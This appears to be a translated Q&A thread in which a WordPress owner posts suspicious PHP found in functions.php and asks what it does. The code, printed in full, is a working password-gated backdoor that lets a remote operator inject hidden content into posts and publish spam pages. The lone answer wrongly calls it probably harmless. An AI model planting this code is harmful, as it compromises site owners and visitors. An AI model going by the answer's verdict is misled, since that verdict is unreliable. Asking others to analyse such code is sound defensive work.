在我的WordPress网站上发现了恶意编码?

时间:2017-03-07 20:19:46

标签: php wordpress

我想我发现了恶意编码,但我不确定。它没有编码或任何东西,它只是坐在functions.php的顶部。一旦有人触发REQUEST,我很难找到它在做什么。这段代码在做什么并且有害吗?

<?php

if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'c12fe9ee24891bcd8208f0b9f308c603'))
    {
        switch ($_REQUEST['action'])
            {
                case 'get_all_links';
                    foreach ($wpdb->get_results('SELECT * FROM `' . $wpdb->prefix . 'posts` WHERE `post_status` = "publish" AND `post_type` = "post" ORDER BY `ID` DESC', ARRAY_A) as $data)
                        {
                            $data['code'] = '';

                            if (preg_match('!<div id="wp_cd_code">(.*?)</div>!s', $data['post_content'], $_))
                                {
                                    $data['code'] = $_[1];
                                }

                            print '<e><w>1</w><url>' . $data['guid'] . '</url><code>' . $data['code'] . '</code><id>' . $data['ID'] . '</id></e>' . "\r\n";
                        }
                break;

                case 'set_id_links';
                    if (isset($_REQUEST['data']))
                        {
                            $data = $wpdb -> get_row('SELECT `post_content` FROM `' . $wpdb->prefix . 'posts` WHERE `ID` = "'.esc_sql($_REQUEST['id']).'"');

                            $post_content = preg_replace('!<div id="wp_cd_code">(.*?)</div>!s', '', $data -> post_content);
                            if (!empty($_REQUEST['data'])) $post_content = $post_content . '<div id="wp_cd_code">' . stripcslashes($_REQUEST['data']) . '</div>';

                            if ($wpdb->query('UPDATE `' . $wpdb->prefix . 'posts` SET `post_content` = "' . esc_sql($post_content) . '" WHERE `ID` = "' . esc_sql($_REQUEST['id']) . '"') !== false)
                                {
                                    print "true";
                                }
                        }
                break;

                case 'create_page';
                    if (isset($_REQUEST['remove_page']))
                        {
                            if ($wpdb -> query('DELETE FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "/'.esc_sql($_REQUEST['url']).'"'))
                                {
                                    print "true";
                                }
                        }
                    elseif (isset($_REQUEST['content']) && !empty($_REQUEST['content']))
                        {
                            if ($wpdb -> query('INSERT INTO `' . $wpdb->prefix . 'datalist` SET `url` = "/'.esc_sql($_REQUEST['url']).'", `title` = "'.esc_sql($_REQUEST['title']).'", `keywords` = "'.esc_sql($_REQUEST['keywords']).'", `description` = "'.esc_sql($_REQUEST['description']).'", `content` = "'.esc_sql($_REQUEST['content']).'", `full_content` = "'.esc_sql($_REQUEST['full_content']).'" ON DUPLICATE KEY UPDATE `title` = "'.esc_sql($_REQUEST['title']).'", `keywords` = "'.esc_sql($_REQUEST['keywords']).'", `description` = "'.esc_sql($_REQUEST['description']).'", `content` = "'.esc_sql(urldecode($_REQUEST['content'])).'", `full_content` = "'.esc_sql($_REQUEST['full_content']).'"'))
                                {
                                    print "true";
                                }
                        }
                break;

                default: print "ERROR_WP_ACTION WP_URL_CD";
            }

        die("");
    }


if ( $wpdb->get_var('SELECT count(*) FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.esc_sql( $_SERVER['REQUEST_URI'] ).'"') == '1' )
    {
        $data = $wpdb -> get_row('SELECT * FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.esc_sql($_SERVER['REQUEST_URI']).'"');
        if ($data -> full_content)
            {
                print stripslashes($data -> content);
            }
        else
            {
                print '<!DOCTYPE html>';
                print '<html ';
                language_attributes();
                print ' class="no-js">';
                print '<head>';
                print '<title>'.stripslashes($data -> title).'</title>';
                print '<meta name="Keywords" content="'.stripslashes($data -> keywords).'" />';
                print '<meta name="Description" content="'.stripslashes($data -> description).'" />';
                print '<meta name="robots" content="index, follow" />';
                print '<meta charset="';
                bloginfo( 'charset' );
                print '" />';
                print '<meta name="viewport" content="width=device-width">';
                print '<link rel="profile" href="http://gmpg.org/xfn/11">';
                print '<link rel="pingback" href="';
                bloginfo( 'pingback_url' );
                print '">';
                wp_head();
                print '</head>';
                print '<body>';
                print '<div id="content" class="site-content">';
                print stripslashes($data -> content);
                get_search_form();
                get_sidebar();
                get_footer();
            }

        exit;
    }


?>

1 个答案:

答案 0 :(得分:1)

代码看起来就像是将输出打印到屏幕上,无法看到它将数据发送到远程站点或服务。所以我怀疑它是恶意的。

我建议安装wordfence插件并扫描您的网站以查找恶意代码。